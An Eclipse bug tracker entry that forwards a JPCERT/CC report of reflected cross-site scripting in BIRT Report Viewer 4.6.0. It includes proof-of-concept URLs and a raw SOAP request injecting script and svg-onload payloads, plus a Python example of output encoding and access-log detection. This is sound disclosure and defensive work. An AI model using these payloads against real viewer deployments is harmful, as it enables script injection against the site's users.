Bug 531688 - Report viewer is vulnerable to cross-site scripting
Summary: Report viewer is vulnerable to cross-site scripting
Status: NEW
Alias: None
Product: z_Archived
Classification: Eclipse Foundation
Component: BIRT
Version: unspecified
Hardware: All  OS: All
Importance: P3 normal
Target Milestone: ---
Assignee: Birt-ReportViewer CLA
QA Contact:
URL:
Whiteboard:
Keywords: security
Depends on:
Blocks:
 
Reported: 2018-02-26 11:50 EST by Benjamin Cabé CLA
Modified: 2020-01-10 11:42 EST
CC: 3 users

See Also:


Attachments

Description Benjamin Cabé CLA 2018-02-26 11:50:02 EST
From the security@eclipse.org inbox:

Dear Eclipse Security Team,

Hello.  This is Hirozumi Nihonmatsu from JPCERT/CC.

Attached to this email is the original report and the details of 
the reported vulnerability.
The zip file is password-protected, and the password will be notified
by a separate email.

 - BIRT vulnerable to cross-site scripting

Please read through the report and return to us with the
information such as;
- validate the products, and whether the reported vulnerability
  is confirmed or not
- solutions (e.g., patch or module update)
- workarounds if any
- estimated time for creation of fixes
- preferable date for public release on your site
 *we will also publish an advisory for this issue on our
  vulnerability knowledge base, JVN,
  http://jvn.jp, http://jvn.jp/en/,
  synchronizing with your release schedule.

 **Caution**
 We have assigned the Vulnerability ID (VN) and its tracking
 number (TN) for this vulnerability issue;
   VN: JVN#53394617 / TN: JPCERT#95206031
 Please be sure to include these numbers in the subject line for
 future communication with us.  We appreciate your cooperation
 on this.

If you have any questions and concerns, please do not hesitate to
contact us any time.

Thank you in advance for your attention on this matter.
We are looking forward to hearing from you.

Sincerely yours,

Hirozumi Nihonmatsu
JPCERT/CC Vulnerability Handling Team

==================================================================
JPCERT Coordination Center (JPCERT/CC)
TEL: +81-3-3518-4600 FAX: +81-3-3518-4602 EMAIL: vuls@jpcert.or.jp
PGP key: 0xE46138B5: E9EA 6B5F 7C3B F3D6 5539  F758 4E9D 7E92 E461 38B5
https://www.jpcert.or.jp/english/
Comment 1 Benjamin Cabé CLA 2018-02-26 11:50:14 EST
-----------------------------------------------------------------
Vulnerability Report for JVN#53394617 (begins here)
-----------------------------------------------------------------
[Title and VUL ID]
  - JVN#53394617
  - BIRT vulnerable to cross-site scripting
    
[Original finder/reporter's information]
  - Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc.

[Affected product and version]
  - BIRT Report Viewer ver.4.6.0
    http://www.eclipse.org/birt/
    https://projects.eclipse.org/projects/birt

[Reproduction Procedure]
     <Scenario 1>
     Put the malicious link below, which will be sent with a GET parameter, into the browser.
     
    http://<Hostname>/birt-viewer/run?__report=report%2FR_S05.rptdesign&__masterpage=true&__format=html&__parameterpage=false&PROJECT_ID=2&TICKET_ID=1xxx&__islocale=TICKET_IDxxx&TARGET_DATE_FROM=2011%2F04%2F01&__islocale=TARGET_DATE_FROM&TARGET_DATE_TO=2011%2F12%2F25&__islocale=TARGET_DATE_TO&INDEX=0&__islocale=INDEX&HELP_FLAG=true"><script>alert(7)</script>xxx&__islocale=HELP_FLAG&NEW_WINDOW_FLAG=false"><script>alert(6)</script>xxx&__islocale=NEW_WINDOW_FLAG&BIND_OFFSET=10"><script>alert(5)</script>xxx&__islocale=BIND_OFFSET&LIMMIT=10"><script>alert(4)</script>xxx&__islocale=LIMMIT&DRILL_FLAG=true"><script>alert(3)</script>xxxxx&__islocale=DRILL_FLAGxxxxx&DRILL_FIRST_FLAG=true"><script>alert(2)</script>xxxx&__islocale=DRILL_FIRST_FLAG&NAVI_CREATE_FLAG=NAVI_CREATE_FLAG"><script>alert(1)</script>xxxxxx&__islocale=NAVI_CREATE_FLAG

     <Scenario 2>
   POST /birt-viewer/frameset?__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html&__islocale=NAVI_CREATE_FLAG&__id=birtViewerR_M02&__sessionId=20170403_102433_278 HTTP/1.1
     Host: 192.168.153.132
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
     Accept: */*
     Accept-Language: ja,en-US;q=0.7,en;q=0.3
     Referer: http://192.168.153.132/birt-viewer/frameset?__id=birtViewerR_M02&__report=report%2FR_M02.rptdesign&__masterpage=true&__format=html
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.4.0
     Content-Type: application/x-www-form-urlencoded, text/xml; charset=UTF-8
     SOAPAction: ""
     request-type: SOAP
     Content-Length: 1350
     Cookie: JSESSIONID=78E16375AA18933FBEB220A740EB64B6; _redmine_session=BAh7DToVaW1wb3J0ZXJfd3JhcHBlciIGIiIVZmlsZXNfaW5kZXhfc29ydCINZmlsZW5hbWU6DHVzZXJfaWRpBjoPc2Vzc2lvbl9pZCIlOTBiZDUyODhjZmJhNDRjNTUzODkwNTI0YjQ1MDc3MGM6EF9jc3JmX3Rva2VuIjFSMkJDWVJtRUpUYU1JTm5LcWN3TVZqdDBINmpac0I5T244MjdjdWdCWDhNPToWaW1wb3J0ZXJfZW5jb2RpbmciBlU6FWltcG9ydGVyX3RtcGZpbGUiNS90bXAvcmVkbWluZV9pbXBvcnRlcl9pcGZzYW1wbGVwcm9qZWN0X2FkbWluLmNzdjoWaW1wb3J0ZXJfc3BsaXR0ZXIiBiw%3D--9b9d1429e54db160dfa79ce9ec1f158865afc50d
     Connection: close

     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>ChangeParameter</Operator><Oprand><Name>CONDITION</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__CONDITION</Name><Value>?????°?????????</Value></Oprand><Oprand><Name>__islocale</Name><Value>THRESHOLD</Value></Oprand><Oprand><Name>THRESHOLD</Name><Value>&lt;svg onload=alert()&gt;</Value></Oprand><Oprand><Name>__isdisplay__THRESHOLD</Name><Value>&lt;svg onload=alert()&gt;</Value></Oprand><Oprand><Name>USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>__isdisplay__USER_ID</Name><Value>1</Value></Oprand><Oprand><Name>LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>__isdisplay__LIMMIT</Name><Value>10</Value></Oprand><Oprand><Name>BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>__isdisplay__BIND_OFFSET</Name><Value>0</Value></Oprand><Oprand><Name>HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__HELP_FLAG</Name><Value>true</Value></Oprand><Oprand><Name>__svg</Name><Value>false</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value>2017-3-3-10-25-31-70</Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>]

[Proof-of-Concept Code]
  Written in "Reproduction Procedure" section above.

[CVSSv2 and v3 Scores]
-----------------------------------------------------------------
CVSSv2
-----------------------------------------------------------------
AV:N/AC:M/Au:N/C:N/I:P/A:N/BS:4.3
-----------------------------------------------------------------
CVSSv3
-----------------------------------------------------------------
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/BS:6.1
-----------------------------------------------------------------
-----------------------------------------------------------------
Vulnerability Report for JVN#53394617 (ends here)
-----------------------------------------------------------------
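Both scenarios in the report have the same root cause: a report parameter value (Scenario 1) or a `__isdisplay__` value (Scenario 2) is written back into the viewer's HTML without output encoding, so a value ending in `"><script>` closes the attribute it sits in and becomes markup. The script below is an added illustration, not BIRT code: it renders a hidden form field the way a viewer might (the exact markup is an assumption), shows that HTML-attribute encoding keeps the report's own `HELP_FLAG` payload inert, and then applies the same "value contains HTML metacharacters" test to constructed access-log lines so a defender can find requests of this shape. The log lines, client addresses and field layout are constructed for the example.

```python
"""Defensive checks for the BIRT viewer reflected-XSS pattern (added example, not BIRT code)."""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Payload taken from Scenario 1 of the report (HELP_FLAG parameter).
POC_VALUE = 'true"><script>alert(7)</script>xxx'


# --- 1. Reflection into an HTML attribute: unescaped vs. encoded ------------

def render_hidden_field(name: str, value: str, escape: bool) -> str:
    """Build the kind of hidden <input> a viewer emits to carry a report
    parameter between pages. Hypothetical markup; what matters is that
    `value` lands inside a double-quoted attribute."""
    if escape:
        # html.escape with quote=True encodes & < > " and ' so the value
        # cannot terminate the attribute or start a new tag.
        name = html.escape(name, quote=True)
        value = html.escape(value, quote=True)
    return f'<input type="hidden" name="{name}" value="{value}">'


class _TagCollector(HTMLParser):
    """Records every element start tag so we can see whether a parameter
    value was interpreted as markup by a real HTML tokenizer."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(fragment: str) -> list[str]:
    """Return the start tags the browser-like parser sees in `fragment`."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


# --- 2. Detection: query parameters carrying HTML metacharacters ------------

MARKUP_CHARS = ('<', '>', '"', "'")


def suspicious_parameters(request_target: str) -> dict[str, str]:
    """Decode the query string and return {name: value} for every parameter
    whose value contains a character that would break out of an attribute
    if reflected without encoding."""
    query = urlsplit(request_target).query
    hits: dict[str, str] = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if any(c in value for c in MARKUP_CHARS):
                hits[name] = value
    return hits


def scan_access_log(lines: list[str]) -> list[tuple[str, dict[str, str]]]:
    """Apply suspicious_parameters to each Combined-Log-Format line and return
    (client_ip, flagged_parameters) for lines with at least one hit."""
    findings = []
    for line in lines:
        try:
            client_ip = line.split(" ", 1)[0]
            request_line = line.split('"', 2)[1]        # GET /path?query HTTP/1.1
            target = request_line.split(" ")[1]
        except IndexError:
            continue                                    # not a request line we understand
        hits = suspicious_parameters(target)
        if hits:
            findings.append((client_ip, hits))
    return findings


# Constructed sample log (documentation-range IPs); the first line carries the
# report's Scenario 1 payload percent-encoded as a browser would send it.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Feb/2018:11:50:02 -0500] "GET /birt-viewer/run?__report=report%2FR_S05.rptdesign'
    '&__format=html&HELP_FLAG=true%22%3E%3Cscript%3Ealert(7)%3C/script%3Exxx&__islocale=HELP_FLAG HTTP/1.1" 200 5120',
    '198.51.100.4 - - [26/Feb/2018:11:51:10 -0500] "GET /birt-viewer/run?__report=report%2FR_S05.rptdesign'
    '&__format=html&HELP_FLAG=true&__islocale=HELP_FLAG HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print("unencoded :", tags_in(render_hidden_field("HELP_FLAG", POC_VALUE, escape=False)))
    print("encoded   :", tags_in(render_hidden_field("HELP_FLAG", POC_VALUE, escape=True)))
    for ip, hits in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: {hits}")
```

The tokenizer check is the useful part of the first half: with encoding off it reports `['input', 'script']`, with encoding on only `['input']`, which is exactly the difference between the vulnerable viewer and a fixed one. The log scanner is deliberately simple (any metacharacter in any value); on a real BIRT deployment, tune it to the parameter names the reports actually use, since legitimate parameter values rarely contain `<`, `>` or quotes.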
Comment 2 Benjamin Cabé CLA 2018-03-05 09:14:00 EST
Has anyone had time to look at this?
Comment 3 Benjamin Cabé CLA 2018-05-17 10:51:03 EDT
Hello? Does anybody intend to look at this?
Comment 4 Benjamin Cabé CLA 2018-07-03 10:41:34 EDT
ping?
Comment 5 Wayne Beaton CLA 2020-01-10 11:42:41 EST
Project team, there's help regarding how we handle vulnerability reports in the handbook.

https://www.eclipse.org/projects/handbook/#vulnerability